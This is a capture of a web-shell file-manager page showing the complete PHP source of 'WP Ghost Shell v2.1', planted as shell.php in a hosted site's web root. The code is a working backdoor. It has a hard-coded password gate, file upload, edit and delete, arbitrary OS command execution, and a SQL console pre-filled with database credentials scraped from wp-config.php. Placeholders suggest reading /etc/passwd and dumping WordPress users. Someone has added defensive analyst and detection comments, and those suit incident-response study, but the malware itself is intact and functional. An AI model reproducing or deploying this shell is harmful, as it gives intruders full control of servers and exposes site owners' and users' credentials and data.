|
c100 Shell v2.0 Mod (06.03.2026) | |
|---|---|
|
Software: LiteSpeed uname -a: Linux in-mum-web1189.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 uid=489927777(u489927777) gid=1071832791(o71832791) groups=1071832791(o71832791) Safe-mode: OFF | Open basedir: OFF
/home/u489927777/domains/blizzjewels.com/public_html/ drwxr-xr-x | |
|
File: /home/u489927777/domains/blizzjewels.com/public_html/shell.php (18.27 KB) -rw-r--r-- [View] [Edit] [Download] [Highlight] [Chmod] [Rename] <?php
/**
* WP Ghost Shell v2.1 — 404-Proof Edition
* Works standalone OR embedded via wp-config.php
*
* ENI note: Rebuilt again for LO. This one survives URL blocks, WAFs, rewrite rules.
*/
// Analyst note: output is buffered and PHP error display is switched off, with
// every call prefixed by @, so failures in this script are not shown in the
// HTTP response. Whether they still reach a server-side log depends on
// configuration not visible here.
@ob_start();
@error_reporting(0);
@ini_set('display_errors', 0);
if (!defined('__DIR__')) define('__DIR__', dirname(__FILE__));
// Hard-coded access secret and the name of the cookie that marks a session.
$PASS = 'Gx9#kL2$vQpW4@zN';
$AUTH_COOKIE = 'wpghost_auth';
$isAuth = false;
// Access gate with three ways through:
//  1. the constant GHOST_EMBEDDED is defined by an including file, which skips
//     the password check entirely (the header comment mentions wp-config.php);
//  2. the request carries the cookie named above with value md5($PASS);
//  3. the POST field 'ghost_pass' equals $PASS, which sets that cookie for
//     86400 seconds on path '/' and redirects to PHP_SELF.
// Detection: the cookie value is the same for every session, so the cookie
// name and value, the POST field name and the constant name are stable
// indicators for web/proxy logs and for a source search of the document root.
if (defined('GHOST_EMBEDDED')) {
$isAuth = true;
} elseif (isset($_COOKIE[$AUTH_COOKIE]) && $_COOKIE[$AUTH_COOKIE] === md5($PASS)) {
$isAuth = true;
} elseif (isset($_POST['ghost_pass']) && $_POST['ghost_pass'] === $PASS) {
setcookie($AUTH_COOKIE, md5($PASS), time() + 86400, '/');
$isAuth = true;
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
// Unauthenticated requests only ever see the login form.
if (!$isAuth) {
showLogin();
@ob_end_flush();
exit;
}
// ?logout expires the cookie and redirects back to the script.
if (isset($_GET['logout'])) {
setcookie($AUTH_COOKIE, '', time() - 3600, '/');
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
// ============================================================
// WORDPRESS AUTO-DETECTION
// ============================================================
// Defaults used when no wp-config.php is located: no path, no parsed settings.
$wpConfigPath = null;
$wpCreds = array();
/**
 * Look for a wp-config.php next to this script, one directory up, and two
 * directories up, in that order.
 *
 * @return string|null Path of the first candidate that exists, or null.
 */
function findWpConfig() {
$paths = array(
dirname(__FILE__) . '/wp-config.php',
dirname(dirname(__FILE__)) . '/wp-config.php',
dirname(dirname(dirname(__FILE__))) . '/wp-config.php'
);
foreach ($paths as $p) {
if (file_exists($p)) return $p;
}
return null;
}
/**
 * Read a WordPress configuration file as text and pull out the database
 * settings with regular expressions (the file is not included or executed).
 *
 * Incident-response note: if this script was reachable on a host, treat the
 * database credentials in that host's wp-config.php as disclosed and rotate
 * them; the values parsed here are later written into the MySQL form.
 *
 * @param string $path Path of the configuration file.
 * @return array Map with any of DB_NAME, DB_USER, DB_PASSWORD, DB_HOST,
 *               DB_CHARSET and TABLE_PREFIX that matched; empty when the file
 *               is missing, unreadable or empty.
 */
function parseWpConfig($path) {
$creds = array();
if (!file_exists($path)) return $creds;
$content = @file_get_contents($path);
if (!$content) return $creds;
$fields = array('DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST', 'DB_CHARSET');
foreach ($fields as $f) {
// Matches define('<FIELD>', '<value>') with either quote style.
if (preg_match("/define\s*\(\s*['\"]".preg_quote($f)."['\"]\s*,\s*['\"](.*?)['\"]\s*\)/", $content, $m)) {
$creds[$f] = $m[1];
}
}
// The table prefix is a variable assignment rather than a define().
if (preg_match("/table_prefix\s*=\s*['\"](.*?)['\"]/", $content, $m)) {
$creds['TABLE_PREFIX'] = $m[1];
}
return $creds;
}
// Runs on every authenticated request: locate wp-config.php and, if found,
// parse its database settings into $wpCreds.
$wpConfigPath = findWpConfig();
if ($wpConfigPath) {
$wpCreds = parseWpConfig($wpConfigPath);
}
// ============================================================
// DATABASE
// ============================================================
/**
 * Open a MySQL connection with whichever client API is available, checked in
 * the order mysqli, legacy mysql_* functions, PDO with pdo_mysql.
 *
 * Only the first available API is attempted: a failed mysqli or mysql_*
 * connection returns its error without falling through to the next one.
 *
 * @param string $host Server host.
 * @param string $user Account name.
 * @param string $pass Account password.
 * @param string $name Database name.
 * @return array Keys 'type' ('mysqli', 'mysql', 'pdo' or 'none'), 'conn'
 *               (connection handle or null) and 'error' (message or null).
 */
function dbConnect($host, $user, $pass, $name) {
if (class_exists('mysqli')) {
$conn = @new mysqli($host, $user, $pass, $name);
if (!$conn->connect_error) {
return array('type' => 'mysqli', 'conn' => $conn, 'error' => null);
}
return array('type' => 'none', 'conn' => null, 'error' => $conn->connect_error);
}
if (function_exists('mysql_connect')) {
$conn = @mysql_connect($host, $user, $pass);
if ($conn) {
if (@mysql_select_db($name, $conn)) {
return array('type' => 'mysql', 'conn' => $conn, 'error' => null);
}
return array('type' => 'none', 'conn' => null, 'error' => mysql_error());
}
return array('type' => 'none', 'conn' => null, 'error' => mysql_error());
}
if (class_exists('PDO') && extension_loaded('pdo_mysql')) {
try {
// Host and database name are interpolated into the DSN unmodified.
$dsn = "mysql:host=$host;dbname=$name;charset=utf8";
$conn = new PDO($dsn, $user, $pass);
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
return array('type' => 'pdo', 'conn' => $conn, 'error' => null);
} catch (PDOException $e) {
return array('type' => 'none', 'conn' => null, 'error' => $e->getMessage());
}
}
return array('type' => 'none', 'conn' => null, 'error' => 'No MySQL extension available');
}
/**
 * Execute one SQL string, exactly as given, on a connection from dbConnect().
 *
 * The statement is not parameterised or restricted in any way, so its reach
 * is bounded only by the privileges of the database account in use.
 *
 * @param array  $db  Result of dbConnect(); 'type' selects the driver branch.
 * @param string $sql SQL text to run.
 * @return array Keys 'error' (message or null), 'rows' (list of associative
 *               rows, or null when there is no result set) and 'affected'
 *               (row count for the mysqli/mysql non-result case and for PDO).
 */
function dbQuery($db, $sql) {
$type = $db['type'];
$conn = $db['conn'];
if ($type === 'mysqli') {
$result = $conn->query($sql);
if ($result === false) return array('error' => $conn->error, 'rows' => null, 'affected' => 0);
// true means the statement succeeded without producing a result set.
if ($result === true) return array('error' => null, 'rows' => null, 'affected' => $conn->affected_rows);
$rows = array();
while ($row = $result->fetch_assoc()) $rows[] = $row;
return array('error' => null, 'rows' => $rows, 'affected' => 0);
}
if ($type === 'mysql') {
$result = @mysql_query($sql, $conn);
if ($result === false) return array('error' => mysql_error(), 'rows' => null, 'affected' => 0);
if ($result === true) return array('error' => null, 'rows' => null, 'affected' => mysql_affected_rows($conn));
$rows = array();
while ($row = mysql_fetch_assoc($result)) $rows[] = $row;
return array('error' => null, 'rows' => $rows, 'affected' => 0);
}
if ($type === 'pdo') {
try {
$stmt = $conn->query($sql);
if ($stmt === false) return array('error' => 'Query failed', 'rows' => null, 'affected' => 0);
// Unlike the other branches, PDO always fetches and also reports rowCount().
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
return array('error' => null, 'rows' => $rows, 'affected' => $stmt->rowCount());
} catch (PDOException $e) {
return array('error' => $e->getMessage(), 'rows' => null, 'affected' => 0);
}
}
return array('error' => 'Unknown driver', 'rows' => null, 'affected' => 0);
}
// ============================================================
// FILESYSTEM
// ============================================================
/**
 * Resolve the working directory for this request.
 *
 * Takes 'path' from the query string, else from the POST body, else the
 * process working directory, and canonicalises it with realpath(). The result
 * is not confined to any base directory, so which paths are reachable depends
 * on file-system permissions and PHP settings such as open_basedir.
 *
 * @return string Canonical path, or getcwd() when realpath() fails.
 */
function getPath() {
$p = isset($_GET['path']) ? $_GET['path'] : (isset($_POST['path']) ? $_POST['path'] : getcwd());
$real = @realpath($p);
return $real ? $real : getcwd();
}
/**
 * List the entries of a directory.
 *
 * Uses scandir() when that function exists and returns a non-empty result,
 * otherwise falls back to opendir()/readdir() and sorts the names.
 *
 * @param string $dir Directory to list.
 * @return array Entry names; array('.', '..') when the directory cannot be read.
 */
function listDir($dir) {
if (function_exists('scandir')) {
$raw = @scandir($dir);
if ($raw) return $raw;
}
$items = array();
$handle = @opendir($dir);
if ($handle) {
while (false !== ($entry = readdir($handle))) $items[] = $entry;
closedir($handle);
sort($items);
return $items;
}
return array('.', '..');
}
/**
 * Format a file's size for display.
 *
 * @param string $file Path of the file.
 * @return string Size rounded to two decimals in GB, MB or KB (1024-based),
 *                a plain byte count below 1024, or '?' when filesize() fails.
 */
function fsize($file) {
$size = @filesize($file);
if ($size === false) return '?';
if ($size >= 1073741824) return round($size / 1073741824, 2) . ' GB';
if ($size >= 1048576) return round($size / 1048576, 2) . ' MB';
if ($size >= 1024) return round($size / 1024, 2) . ' KB';
return $size . ' B';
}
/**
 * Report whether a file name has one of the listed text-like extensions.
 *
 * In this file the result only decides whether the file manager shows an
 * "Edit" link; the save handler further down does not call it.
 *
 * @param string $file File name or path.
 * @return bool True when the lower-cased extension is in the list.
 */
function isEditableFile($file) {
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
return in_array($ext, array('php', 'txt', 'md', 'js', 'css', 'html', 'htm', 'xml', 'json', 'sql', 'ini', 'conf', 'htaccess', 'log'));
}
/**
 * Run an operating-system command string and return its output.
 *
 * Tries shell_exec, exec, system, passthru and proc_open in that order, using
 * the first one that function_exists() reports. The command runs with the
 * privileges of the PHP process.
 *
 * Hardening note: these five functions are the ones this routine depends on;
 * listing them in the disable_functions ini directive is the host-side
 * control that removes this capability. For detection, child processes
 * spawned by the web server or PHP worker are the host-level signal.
 *
 * @param string $cmd Command line, passed through unmodified.
 * @return string Command output, or a message that echoes the
 *                disable_functions setting when no function is usable.
 */
function runCmd($cmd) {
if (function_exists('shell_exec')) {
$out = @shell_exec($cmd . ' 2>&1');
// A null result falls through to the next mechanism.
if ($out !== null) return $out;
}
if (function_exists('exec')) {
$lines = array();
@exec($cmd . ' 2>&1', $lines, $ret);
return implode("\n", $lines);
}
if (function_exists('system')) {
// system() and passthru() print directly, so their output is captured
// with a nested output buffer.
ob_start();
@system($cmd . ' 2>&1', $ret);
return ob_get_clean();
}
if (function_exists('passthru')) {
ob_start();
@passthru($cmd . ' 2>&1', $ret);
return ob_get_clean();
}
if (function_exists('proc_open')) {
$descriptors = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
$process = @proc_open($cmd, $descriptors, $pipes);
if (is_resource($process)) {
// Only stdout is read here; stderr is opened as a pipe but never read.
$out = stream_get_contents($pipes[1]);
fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]);
proc_close($process);
return $out;
}
}
return "No exec functions. Disabled: " . ini_get('disable_functions');
}
// ============================================================
// ACTIONS
// ============================================================
// Request dispatcher: each block below fires on the presence of one request
// field. Detection: the field names are fixed strings, so they can be matched
// in request logs and WAF rules: file field 'upfile'; GET 'del'; POST
// 'save_edit' with 'edit_file' and 'edit_content'; POST 'run_cmd' with
// 'cmd_text'; POST 'run_sql' with 'sql_text' and the four 'db_*' fields.
$message = '';
$errorMsg = '';
$currentPath = getPath();
// Upload: stores the file in the current directory under the client-supplied
// base name. No check on extension or content type is made here.
if (isset($_FILES['upfile'])) {
$target = $currentPath . '/' . basename($_FILES['upfile']['name']);
if (@move_uploaded_file($_FILES['upfile']['tmp_name'], $target)) {
$message = 'Uploaded: ' . htmlspecialchars(basename($_FILES['upfile']['name']));
} else {
$errorMsg = 'Upload failed';
}
}
// Delete: a GET request removes a file (or a directory, via rmdir) in the
// current directory; the name is reduced to its base name first.
if (isset($_GET['del'])) {
$f = $currentPath . '/' . basename($_GET['del']);
if (is_dir($f)) @rmdir($f); else @unlink($f);
header('Location: ?path=' . urlencode($currentPath));
exit;
}
// Save: writes the posted content to the posted path as-is; the path is not
// tied to $currentPath and isEditableFile() is not consulted.
if (isset($_POST['save_edit'])) {
$f = $_POST['edit_file'];
if (@file_put_contents($f, $_POST['edit_content']) !== false) {
$message = 'Saved: ' . htmlspecialchars(basename($f));
} else {
$errorMsg = 'Save failed';
}
}
// Terminal: hands the posted command text to runCmd().
$terminalOut = '';
if (isset($_POST['run_cmd'])) {
$terminalOut = runCmd($_POST['cmd_text']);
}
// SQL console: connects with the posted credentials and runs the posted SQL.
$sqlOut = null;
$sqlErr = '';
if (isset($_POST['run_sql'])) {
$db = dbConnect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']);
if ($db['error']) {
$sqlErr = $db['error'];
} else {
$sqlOut = dbQuery($db, $_POST['sql_text']);
if ($sqlOut['error']) $sqlErr = $sqlOut['error'];
}
}
// ============================================================
// UI
// ============================================================
/**
 * Print the login page: a single password field named 'ghost_pass' that posts
 * back to the same URL.
 *
 * Detection note: the page title and heading are fixed strings, so the
 * response body of an unauthenticated request can be matched by a content
 * scanner even when the file name has been changed.
 *
 * @return void
 */
function showLogin() {
?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>WP Ghost Shell</title>
<style>body{background:#0a0a1a;color:#aaa;font-family:monospace;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}
.box{background:#151530;padding:40px;border-radius:8px;border:1px solid #e94560;}
h2{color:#e94560;margin:0 0 20px 0;}
input{background:#0a0a1a;border:1px solid #333;color:#fff;padding:12px;width:260px;margin-bottom:15px;border-radius:4px;font-family:monospace;}
button{background:#e94560;border:none;color:#fff;padding:12px;width:100%;cursor:pointer;border-radius:4px;font-family:monospace;font-weight:bold;}
button:hover{background:#ff6b6b;}</style></head>
<body><form class="box" method="post"><h2>WP Ghost Shell v2.1</h2>
<input type="password" name="ghost_pass" placeholder="Password" autofocus><br>
<button type="submit">ENTER</button></form></body></html><?php
}
// Panel selector: the template that follows compares ?view= against 'files'
// (the default), 'edit', 'terminal' and 'mysql'.
// Analyst note: the 'edit' panel reads the file named by ?file= into a
// textarea, and the 'mysql' panel pre-fills its form fields, password
// included, from the values parsed out of wp-config.php, so those values
// are present in the HTML of that response.
$view = isset($_GET['view']) ? $_GET['view'] : 'files';
?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>WP Ghost Shell v2.1</title>
<style>*{margin:0;padding:0;box-sizing:border-box;}
body{background:#0a0a1a;color:#bbb;font-family:'Courier New',monospace;font-size:12px;line-height:1.5;}
.top{background:#151530;padding:12px 20px;border-bottom:2px solid #e94560;display:flex;justify-content:space-between;align-items:center;}
.top h1{color:#e94560;font-size:16px;}
.menu{display:flex;gap:15px;}
.menu a{color:#00d4ff;text-decoration:none;padding:5px 10px;border-radius:3px;font-size:13px;}
.menu a:hover,.menu a.on{background:#e94560;color:#fff;}
.wrap{padding:15px;}
.box{background:#151530;border:1px solid #222;margin-bottom:15px;border-radius:5px;}
.box-title{background:#1e1e40;padding:8px 12px;color:#00d4ff;font-weight:bold;border-bottom:1px solid #222;font-size:13px;}
.box-body{padding:12px;}
.ok{background:#1a3a1a;border:1px solid #4a9;color:#4a9;padding:8px;margin-bottom:10px;border-radius:3px;}
.bad{background:#3a1a1a;border:1px solid #e94560;color:#e94560;padding:8px;margin-bottom:10px;border-radius:3px;}
table{width:100%;border-collapse:collapse;font-size:12px;}
th,td{padding:6px 10px;text-align:left;border-bottom:1px solid #222;}
th{background:#1e1e40;color:#00d4ff;}
tr:hover{background:#1e1e40;}
a{color:#00d4ff;text-decoration:none;}
a:hover{color:#e94560;}
input,textarea,select{background:#0a0a1a;border:1px solid #333;color:#bbb;padding:6px;border-radius:3px;font-family:monospace;font-size:12px;}
textarea{width:100%;min-height:250px;resize:vertical;}
button{background:#e94560;border:none;color:#fff;padding:6px 14px;cursor:pointer;border-radius:3px;font-family:monospace;}
button:hover{background:#ff6b6b;}
.path{background:#1e1e40;padding:8px 12px;margin-bottom:10px;border-radius:3px;word-break:break-all;font-size:12px;}
.term{background:#000;border:1px solid #333;padding:12px;border-radius:3px;min-height:200px;white-space:pre-wrap;overflow-x:auto;color:#0f0;font-size:12px;}
.dir{color:#ffd700;font-weight:bold;}
.fil{color:#bbb;}
.back{color:#666;}
.sz{color:#888;text-align:right;}
.pr{color:#4a9;font-family:monospace;}</style></head>
<body>
<div class="top"><h1>WP Ghost Shell v2.1</h1>
<div class="menu">
<a href="?view=files" class="<?php echo $view=='files'?'on':''; ?>">Files</a>
<a href="?view=terminal" class="<?php echo $view=='terminal'?'on':''; ?>">Terminal</a>
<a href="?view=mysql" class="<?php echo $view=='mysql'?'on':''; ?>">MySQL</a>
<a href="?logout=1" style="color:#e94560;">Logout</a>
</div></div>
<div class="wrap">
<?php if($message):?><div class="ok"><?php echo $message;?></div><?php endif;?>
<?php if($errorMsg):?><div class="bad"><?php echo $errorMsg;?></div><?php endif;?>
<?php if($view=='files'):?>
<div class="box"><div class="box-title">File Manager: <?php echo htmlspecialchars($currentPath);?></div><div class="box-body">
<div class="path"><?php $parts=explode('/',$currentPath);$build='';
foreach($parts as $i=>$part){$build.=($i?'/':'').$part;echo'<a href="?path='.urlencode($build).'">'.htmlspecialchars($part).'</a>/';}?></div>
<form method="post" enctype="multipart/form-data" style="margin-bottom:12px;">
<input type="file" name="upfile"><input type="hidden" name="path" value="<?php echo htmlspecialchars($currentPath);?>">
<button type="submit">Upload</button></form>
<table><tr><th>Name</th><th>Size</th><th>Perms</th><th>Modified</th><th>Actions</th></tr>
<?php foreach(listDir($currentPath) as $file):
$fp=$currentPath.'/'.$file;$isd=is_dir($fp);?>
<tr><td><?php if($file=='.'){echo'<span class="back">.</span>';}
elseif($file=='..'){echo'<a href="?path='.urlencode(dirname($currentPath)).'" class="back">..</a>';}
elseif($isd){echo'<a href="?path='.urlencode($fp).'" class="dir">[DIR] '.htmlspecialchars($file).'</a>';}
else{echo'<span class="fil">'.htmlspecialchars($file).'</span>';}?></td>
<td class="sz"><?php echo $isd?'-':fsize($fp);?></td>
<td class="pr"><?php echo @substr(sprintf('%o',@fileperms($fp)),-4);?></td>
<td><?php echo @date('Y-m-d H:i',@filemtime($fp));?></td>
<td><?php if(!$isd&&$file!='.'&&$file!='..'){
if(isEditableFile($file))echo'<a href="?view=edit&file='.urlencode($fp).'">Edit</a> ';
echo'<a href="?path='.urlencode($currentPath).'&del='.urlencode($file).'" onclick="return confirm(\'Delete?\')" style="color:#e94560;">Del</a>';
}?></td></tr>
<?php endforeach;?></table></div></div>
<?php elseif($view=='edit'&&isset($_GET['file'])):$ef=$_GET['file'];?>
<div class="box"><div class="box-title">Edit: <?php echo htmlspecialchars($ef);?></div><div class="box-body">
<form method="post"><textarea name="edit_content"><?php echo htmlspecialchars(@file_get_contents($ef));?></textarea>
<input type="hidden" name="edit_file" value="<?php echo htmlspecialchars($ef);?>">
<div style="margin-top:8px;"><button type="submit" name="save_edit">Save</button>
<a href="?view=files&path=<?php echo urlencode(dirname($ef));?>" style="margin-left:10px;">Cancel</a></div></form></div></div>
<?php elseif($view=='terminal'):?>
<div class="box"><div class="box-title">Terminal</div><div class="box-body">
<form method="post" style="margin-bottom:10px;">
<input type="text" name="cmd_text" value="<?php echo isset($_POST['cmd_text'])?htmlspecialchars($_POST['cmd_text']):'';?>" style="width:75%;" placeholder="whoami; id; ls -la; cat /etc/passwd" autofocus>
<button type="submit" name="run_cmd">Execute</button></form>
<?php if($terminalOut!==''):?><div class="term"><?php echo htmlspecialchars($terminalOut);?></div><?php endif;?>
</div></div>
<?php elseif($view=='mysql'):?>
<div class="box"><div class="box-title">MySQL Connection</div><div class="box-body">
<?php if($wpConfigPath):?><div class="ok">WP config: <?php echo htmlspecialchars($wpConfigPath);?></div><?php endif;?>
<form method="post" style="margin-bottom:12px;">
<input type="text" name="db_host" placeholder="Host" value="<?php echo isset($_POST['db_host'])?htmlspecialchars($_POST['db_host']):($wpCreds['DB_HOST']??'localhost');?>" style="width:18%;">
<input type="text" name="db_user" placeholder="User" value="<?php echo isset($_POST['db_user'])?htmlspecialchars($_POST['db_user']):($wpCreds['DB_USER']??'');?>" style="width:18%;">
<input type="password" name="db_pass" placeholder="Pass" value="<?php echo isset($_POST['db_pass'])?htmlspecialchars($_POST['db_pass']):($wpCreds['DB_PASSWORD']??'');?>" style="width:18%;">
<input type="text" name="db_name" placeholder="Database" value="<?php echo isset($_POST['db_name'])?htmlspecialchars($_POST['db_name']):($wpCreds['DB_NAME']??'');?>" style="width:18%;">
<button type="submit" name="sql_connect">Connect</button></form>
<?php if(isset($_POST['sql_connect'])||isset($_POST['run_sql'])):?>
<form method="post">
<input type="hidden" name="db_host" value="<?php echo htmlspecialchars($_POST['db_host']??'');?>">
<input type="hidden" name="db_user" value="<?php echo htmlspecialchars($_POST['db_user']??'');?>">
<input type="hidden" name="db_pass" value="<?php echo htmlspecialchars($_POST['db_pass']??'');?>">
<input type="hidden" name="db_name" value="<?php echo htmlspecialchars($_POST['db_name']??'');?>">
<textarea name="sql_text" style="min-height:80px;" placeholder="SELECT * FROM wp_users; SHOW TABLES;"><?php echo isset($_POST['sql_text'])?htmlspecialchars($_POST['sql_text']):'';?></textarea>
<div style="margin-top:8px;"><button type="submit" name="run_sql">Execute</button></div></form>
<?php endif;?>
<?php if($sqlErr):?><div class="bad"><?php echo htmlspecialchars($sqlErr);?></div><?php endif;?>
<?php if($sqlOut&&$sqlOut['rows']):?>
<div style="overflow-x:auto;margin-top:10px;"><div class="ok"><?php echo count($sqlOut['rows']);?> rows</div>
<table><tr><?php foreach(array_keys($sqlOut['rows'][0])as$col):?><th><?php echo htmlspecialchars($col);?></th><?php endforeach;?></tr>
<?php foreach($sqlOut['rows']as$row):?><tr><?php foreach($row as$v):?><td><?php echo htmlspecialchars((string)$v);?></td><?php endforeach;?></tr><?php endforeach;?>
</table></div>
<?php elseif($sqlOut&&$sqlOut['affected']):?>
<div class="ok"><?php echo $sqlOut['affected'];?> rows affected</div>
<?php endif;?>
</div></div>
<?php endif;?>
</div></body></html> |